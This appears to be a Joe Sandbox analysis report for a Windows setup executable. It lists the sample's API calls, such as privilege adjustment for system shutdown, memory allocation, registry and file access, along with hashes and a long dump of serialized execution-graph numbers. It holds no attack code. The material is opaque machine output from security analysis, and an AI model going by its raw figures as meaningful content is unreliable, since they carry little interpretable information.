• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
• Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
• Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
APIs
• CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
• Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
• Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
• Instruction Fuzzy Hash:
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
• Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
• Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
• Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
APIs
• VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
APIs
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
Strings
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
APIs
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
• SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• GetSystemTime.KERNEL32(?), ref: 004026CE
Similarity
• API ID: SystemTime
• String ID:
• API String ID: 2656138-0
APIs
• GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
Strings
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• API String ID: 4190037839-2401316094
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
• GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
• GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
• GetLastError.KERNEL32(000000F5), ref: 00403C1E
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
  • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
Strings
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
APIs
• RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
• LocalFree.KERNEL32(005EBC20,00000000,00401AB4), ref: 00401A1B
• VirtualFree.KERNEL32(?,00000000,00008000,005EBC20,00000000,00401AB4), ref: 00401A3A
• LocalFree.KERNEL32(005ECC20,?,00000000,00008000,005EBC20,00000000,00401AB4), ref: 00401A79
• RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
• RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID:
• API String ID: 3782394904-0
APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
• ExitProcess.KERNEL32 ref: 00403DE5
Strings
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000$9@
• API String ID: 1220098344-1503883590
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
APIs
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
Strings
Similarity
• API ID: QueryValue
• String ID: )q@
• API String ID: 3660427363-2284170586
APIs
• MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
Strings
• The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
• Setup, xrefs: 00409CAD
Similarity
• API ID: Message
• String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
• API String ID: 2030045667-3271211647
APIs
• GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
• GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: CommandHandleLineModule
• String ID: U1hd.@
• API String ID: 2123368496-2904493091
• Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
• Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
• Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
• Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
APIs
• Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
• Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
• GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
• GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: ErrorLastSleep
• String ID:
• API String ID: 1458359878-0
• Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
• Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
• Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
• Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

Execution Graph

Execution Coverage: 16%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 85
execution_graph: serialized node and edge data of the interactive execution-graph widget (function start addresses, resolved API names such as CloseHandle, FindWindowA, CreateMutexA, LoadLibraryA, GetProcAddress, SetProcessDEPPolicy, WriteFile, MoveFileA, DeleteFileA and Wow64DisableWow64FsRedirection, and node-to-node edge references); the graph layout is not reproducible in text form here.
50388->50375 50390 450e46 50389->50390 50391 450e57 50389->50391 50392 450e4b InterlockedExchange 50390->50392 50391->50374 50391->50387 50392->50391 50394 40b3d3 50393->50394 50395 40b3f3 50394->50395 50416 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50394->50416 50395->50382 50398 402648 4 API calls 50397->50398 50399 4069e7 50398->50399 50399->50382 50412 4769c5 50400->50412 50414 476a0e 50400->50414 50401 476a59 50417 451294 50401->50417 50402 451294 21 API calls 50402->50412 50404 476a70 50406 403420 4 API calls 50404->50406 50408 476a8a 50406->50408 50407 4038a4 4 API calls 50407->50414 50408->50382 50411 403450 4 API calls 50411->50414 50412->50402 50412->50414 50423 4038a4 50412->50423 50432 403744 50412->50432 50436 403450 50412->50436 50413 403744 4 API calls 50413->50414 50414->50401 50414->50407 50414->50411 50414->50413 50415 451294 21 API calls 50414->50415 50415->50414 50416->50395 50418 4512af 50417->50418 50422 4512a4 50417->50422 50442 451238 21 API calls 50418->50442 50420 4512ba 50420->50422 50443 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50420->50443 50422->50404 50425 4038b1 50423->50425 50431 4038e1 50423->50431 50424 403400 4 API calls 50427 4038cb 50424->50427 50426 4038da 50425->50426 50428 4038bd 50425->50428 50429 4034bc 4 API calls 50426->50429 50427->50412 50444 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50428->50444 50429->50431 50431->50424 50433 40374a 50432->50433 50435 40375b 50432->50435 50434 4034bc 4 API calls 50433->50434 50433->50435 50434->50435 50435->50412 50437 403454 50436->50437 50440 403464 50436->50440 50439 4034bc 4 API calls 50437->50439 50437->50440 50438 403490 50438->50412 50439->50440 50440->50438 50441 402660 4 API calls 50440->50441 50441->50438 50442->50420 50443->50422 50444->50427 50445 41ee54 50446 41ee63 IsWindowVisible 50445->50446 50447 41ee99 50445->50447 50446->50447 50448 41ee6d IsWindowEnabled 50446->50448 50448->50447 50449 41ee77 50448->50449 50450 402648 4 API 
calls 50449->50450 50451 41ee81 EnableWindow 50450->50451 50451->50447 50452 46bb10 50453 46bb44 50452->50453 50484 46bfad 50452->50484 50457 46bbdc 50453->50457 50458 46bbba 50453->50458 50459 46bbcb 50453->50459 50460 46bb98 50453->50460 50461 46bba9 50453->50461 50470 46bb80 50453->50470 50454 403400 4 API calls 50456 46bfec 50454->50456 50465 403400 4 API calls 50456->50465 50775 46baa0 45 API calls 50457->50775 50508 46b6d0 50458->50508 50774 46b890 67 API calls 50459->50774 50772 46b420 47 API calls 50460->50772 50773 46b588 42 API calls 50461->50773 50469 46bff4 50465->50469 50468 46bb9e 50468->50470 50468->50484 50470->50484 50543 468c74 50470->50543 50471 46bc18 50471->50484 50487 46bc5b 50471->50487 50776 494da0 50471->50776 50474 46bd7e 50795 48358c 123 API calls 50474->50795 50475 414ae8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50475->50487 50478 46bd99 50478->50484 50479 42cbc0 6 API calls 50479->50487 50480 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50480->50487 50481 46af68 23 API calls 50481->50487 50484->50454 50485 46bdd7 50561 469f1c 50485->50561 50486 46af68 23 API calls 50486->50484 50487->50474 50487->50475 50487->50479 50487->50480 50487->50481 50487->50484 50487->50485 50504 46be9f 50487->50504 50546 468bb0 50487->50546 50554 46acd4 50487->50554 50699 483084 50487->50699 50812 46b1dc 19 API calls 50487->50812 50489 46be3d 50490 403450 4 API calls 50489->50490 50491 46be4d 50490->50491 50492 46bea9 50491->50492 50493 46be59 50491->50493 50498 46bf6b 50492->50498 50622 46af68 50492->50622 50796 457f1c 50493->50796 50497 457f1c 24 API calls 50497->50504 50504->50486 50813 46c424 50508->50813 50511 46b852 50513 403420 4 API calls 50511->50513 50515 46b86c 50513->50515 50514 46b71e 50516 46b83e 50514->50516 50820 455f84 13 API calls 50514->50820 50517 403400 4 API calls 50515->50517 50516->50511 50519 403450 4 API calls 50516->50519 50520 46b874 50517->50520 50519->50511 50521 403400 4 API calls 50520->50521 50522 46b87c 
50521->50522 50522->50470 50523 46b801 50523->50511 50523->50516 50528 42cd48 7 API calls 50523->50528 50525 46b7a1 50525->50511 50525->50523 50830 42cd48 50525->50830 50527 46b73c 50527->50525 50821 466600 50527->50821 50530 46b817 50528->50530 50530->50516 50535 451458 4 API calls 50530->50535 50534 466600 19 API calls 50537 46b77c 50534->50537 50538 46b82e 50535->50538 50837 47efd0 42 API calls 50538->50837 50544 468bb0 19 API calls 50543->50544 50545 468c83 50544->50545 50545->50471 50547 468bdf 50546->50547 50548 4078f4 19 API calls 50547->50548 50551 468c20 50547->50551 50549 468c18 50548->50549 51090 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50549->51090 50552 403400 4 API calls 50551->50552 50553 468c38 50552->50553 50553->50487 50555 46ace5 50554->50555 50556 46ace0 50554->50556 51176 469a80 46 API calls 50555->51176 50558 46ace3 50556->50558 51091 46a740 50556->51091 50558->50487 50559 46aced 50559->50487 50562 403400 4 API calls 50561->50562 50563 469f4a 50562->50563 51553 47dd00 50563->51553 50565 469fad 50566 469fb1 50565->50566 50567 469fca 50565->50567 51560 466800 50566->51560 50569 469fbb 50567->50569 51563 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50567->51563 50571 46a25e 50569->50571 50574 46a154 50569->50574 50575 46a0e9 50569->50575 50572 403420 4 API calls 50571->50572 50577 46a288 50572->50577 50573 469fe6 50573->50569 50578 469fee 50573->50578 50576 403494 4 API calls 50574->50576 50579 403494 4 API calls 50575->50579 50581 46a161 50576->50581 50577->50489 50582 46af68 23 API calls 50578->50582 50580 46a0f6 50579->50580 50583 40357c 4 API calls 50580->50583 50584 40357c 4 API calls 50581->50584 50591 469ffb 50582->50591 50585 46a103 50583->50585 50586 46a16e 50584->50586 50587 40357c 4 API calls 50585->50587 50588 40357c 4 API calls 50586->50588 50589 46a110 50587->50589 50590 46a17b 50588->50590 50592 40357c 4 API calls 50589->50592 50593 40357c 4 API calls 50590->50593 50596 46a024 SetActiveWindow 50591->50596 
50597 46a03c 50591->50597 50594 46a11d 50592->50594 50595 46a188 50593->50595 50598 466800 20 API calls 50594->50598 50599 40357c 4 API calls 50595->50599 50596->50597 51564 42f560 50597->51564 50600 46a12b 50598->50600 50601 46a196 50599->50601 50603 40357c 4 API calls 50600->50603 50604 414b18 4 API calls 50601->50604 50606 46a134 50603->50606 50607 46a152 50604->50607 50609 40357c 4 API calls 50606->50609 51581 466b38 50607->51581 50612 46a141 50609->50612 50611 46a08d 50614 46ade4 21 API calls 50611->50614 50613 414b18 4 API calls 50612->50613 50613->50607 50615 46a0bf 50614->50615 50615->50489 50623 468c74 19 API calls 50622->50623 50624 46af80 50623->50624 50625 46afa2 50624->50625 50626 4652cc 7 API calls 50624->50626 51777 4652cc 50625->51777 50626->50625 50630 46afba 50631 46ade4 21 API calls 50630->50631 50632 46aff2 50631->50632 50633 414b18 4 API calls 50632->50633 50634 46b006 50633->50634 50635 46b012 50634->50635 50636 46b03c 50634->50636 50637 414b18 4 API calls 50635->50637 50639 46b05b 50636->50639 50640 46b085 50636->50640 50638 46b026 50637->50638 50641 414b18 4 API calls 50638->50641 50642 414b18 4 API calls 50639->50642 50643 414b18 4 API calls 50640->50643 50645 46b03a 50641->50645 50646 46b06f 50642->50646 50644 46b099 50643->50644 50647 414b18 4 API calls 50644->50647 50648 414b18 4 API calls 50646->50648 50647->50645 50648->50645 50700 46c424 48 API calls 50699->50700 50701 4830c7 50700->50701 50702 4830d0 50701->50702 52064 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50701->52064 50704 414ae8 4 API calls 50702->50704 50705 4830e0 50704->50705 50706 403450 4 API calls 50705->50706 50707 4830ed 50706->50707 51866 46c77c 50707->51866 50710 4830fd 50712 414ae8 4 API calls 50710->50712 50713 48310d 50712->50713 50714 403450 4 API calls 50713->50714 50715 48311a 50714->50715 50716 469868 SendMessageA 50715->50716 50717 483133 50716->50717 50718 483184 50717->50718 52066 479e18 23 API calls 50717->52066 51895 4241dc 
IsIconic 50718->51895 50722 48319f SetActiveWindow 50723 4831b4 50722->50723 51903 4824b4 50723->51903 50772->50468 50773->50470 50774->50470 50775->50470 53719 43d9c8 50776->53719 50779 494dcc 53724 431bd0 50779->53724 50780 494e52 50781 494e61 50780->50781 53757 4945c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50780->53757 50781->50487 50790 494e16 53755 49465c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50790->53755 50792 494e2a 53756 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50792->53756 50794 494e4a 50794->50487 50795->50478 50797 457f41 50796->50797 50798 457f61 50797->50798 50799 4078f4 19 API calls 50797->50799 50800 403400 4 API calls 50798->50800 50801 457f59 50799->50801 50802 457f76 50800->50802 50803 457d10 24 API calls 50801->50803 50802->50497 50803->50798 50812->50487 50838 46c4bc 50813->50838 50816 414ae8 50817 414af6 50816->50817 50818 4034e0 4 API calls 50817->50818 50819 414b03 50818->50819 50819->50514 50820->50527 50822 46661a 50821->50822 51041 4078f4 50822->51041 51084 42cccc 50830->51084 50833 451458 50834 451428 4 API calls 50833->50834 50835 451474 50834->50835 50836 47efd0 42 API calls 50835->50836 50836->50523 50837->50516 50839 414ae8 4 API calls 50838->50839 50840 46c4f0 50839->50840 50899 466898 50840->50899 50844 46c502 50845 46c511 50844->50845 50848 46c52a 50844->50848 50968 47efd0 42 API calls 50845->50968 50847 403420 4 API calls 50850 46b702 50847->50850 50849 46c571 50848->50849 50851 46c558 50848->50851 50852 46c5d6 50849->50852 50857 46c575 50849->50857 50850->50511 50850->50816 50969 47efd0 42 API calls 50851->50969 50971 42cb4c CharNextA 50852->50971 50855 46c5e5 50856 46c5e9 50855->50856 50861 46c602 50855->50861 50972 47efd0 42 API calls 50856->50972 50859 46c5bd 50857->50859 50857->50861 50970 47efd0 42 API calls 50859->50970 50860 46c626 50973 47efd0 42 API calls 50860->50973 50861->50860 50913 466a08 50861->50913 50866 46c525 50866->50847 50869 46c63f 50921 403778 50869->50921 50874 46c666 50974 
466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50874->50974 50875 46c697 50932 42c8cc 50875->50932 50878 46c679 50880 451458 4 API calls 50878->50880 50882 46c686 50880->50882 50975 47efd0 42 API calls 50882->50975 50904 4668b2 50899->50904 50900 406bb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50900->50904 50902 42cbc0 6 API calls 50902->50904 50903 403450 4 API calls 50903->50904 50904->50900 50904->50902 50904->50903 50905 4668fb 50904->50905 50978 42caac 50904->50978 50906 403420 4 API calls 50905->50906 50907 466915 50906->50907 50908 414b18 50907->50908 50909 414ae8 4 API calls 50908->50909 50910 414b3c 50909->50910 50911 403400 4 API calls 50910->50911 50912 414b6d 50911->50912 50912->50844 50914 466a12 50913->50914 50915 466a25 50914->50915 50994 42cb3c CharNextA 50914->50994 50915->50860 50917 466a38 50915->50917 50918 466a42 50917->50918 50919 466a6f 50918->50919 50995 42cb3c CharNextA 50918->50995 50919->50860 50919->50869 50922 4037aa 50921->50922 50923 40377d 50921->50923 50924 403400 4 API calls 50922->50924 50923->50922 50925 403791 50923->50925 50927 4037a0 50924->50927 50926 4034e0 4 API calls 50925->50926 50926->50927 50928 42c99c 50927->50928 50929 42c9b2 50928->50929 50930 42c9f5 50928->50930 50929->50930 50996 42cb3c CharNextA 50929->50996 50930->50874 50930->50875 50997 42c674 50932->50997 50968->50866 50969->50866 50970->50866 50971->50855 50972->50866 50973->50866 50974->50878 50975->50866 50979 403494 4 API calls 50978->50979 50980 42cabc 50979->50980 50981 403744 4 API calls 50980->50981 50983 42caf2 50980->50983 50987 42c444 IsDBCSLeadByte 50980->50987 50981->50980 50984 42cb36 50983->50984 50988 4037b8 50983->50988 50993 42c444 IsDBCSLeadByte 50983->50993 50984->50904 50987->50980 50989 403744 4 API calls 50988->50989 50991 4037c6 50989->50991 50990 4037fc 50990->50983 50991->50990 50992 4038a4 4 API calls 50991->50992 50992->50990 50993->50983 50994->50914 50995->50918 50996->50929 51000 42c67c 50997->51000 51003 42c68d 
51000->51003 51001 42c6f1 51004 42c6ec 51001->51004 51008 42c444 IsDBCSLeadByte 51001->51008 51003->51001 51006 42c6ab 51003->51006 51006->51004 51007 42c444 IsDBCSLeadByte 51006->51007 51007->51006 51008->51004 51044 407908 51041->51044 51045 407925 51044->51045 51052 4075b8 51045->51052 51048 407951 51050 4034e0 4 API calls 51048->51050 51051 407903 51050->51051 51051->50534 51055 4075d3 51052->51055 51053 4075e5 51053->51048 51057 4069a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51053->51057 51055->51053 51058 4076da 19 API calls 51055->51058 51059 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51055->51059 51057->51048 51058->51055 51059->51055 51085 42cbc0 6 API calls 51084->51085 51086 42ccee 51085->51086 51087 42ccf6 GetFileAttributesA 51086->51087 51088 403400 4 API calls 51087->51088 51089 42cd13 51088->51089 51089->50523 51089->50833 51090->50551 51093 46a787 51091->51093 51092 46abff 51095 46ac1a 51092->51095 51096 46ac4b 51092->51096 51093->51092 51094 46a842 51093->51094 51097 403494 4 API calls 51093->51097 51100 46a863 51094->51100 51101 46a8a4 51094->51101 51098 403494 4 API calls 51095->51098 51099 403494 4 API calls 51096->51099 51103 46a7c6 51097->51103 51104 46ac28 51098->51104 51105 46ac59 51099->51105 51102 403494 4 API calls 51100->51102 51109 403400 4 API calls 51101->51109 51106 46a871 51102->51106 51107 414ae8 4 API calls 51103->51107 51203 46915c 12 API calls 51104->51203 51204 46915c 12 API calls 51105->51204 51111 414ae8 4 API calls 51106->51111 51112 46a7e7 51107->51112 51113 46a8a2 51109->51113 51115 46a892 51111->51115 51177 403634 51112->51177 51133 46a988 51113->51133 51183 469868 51113->51183 51114 46ac36 51117 403400 4 API calls 51114->51117 51118 403634 4 API calls 51115->51118 51121 46ac7c 51117->51121 51118->51113 51126 403400 4 API calls 51121->51126 51122 46aa10 51124 403400 4 API calls 51122->51124 51129 46aa0e 51124->51129 51125 46a8c4 51130 46a902 51125->51130 51131 46a8ca 51125->51131 51127 46ac84 
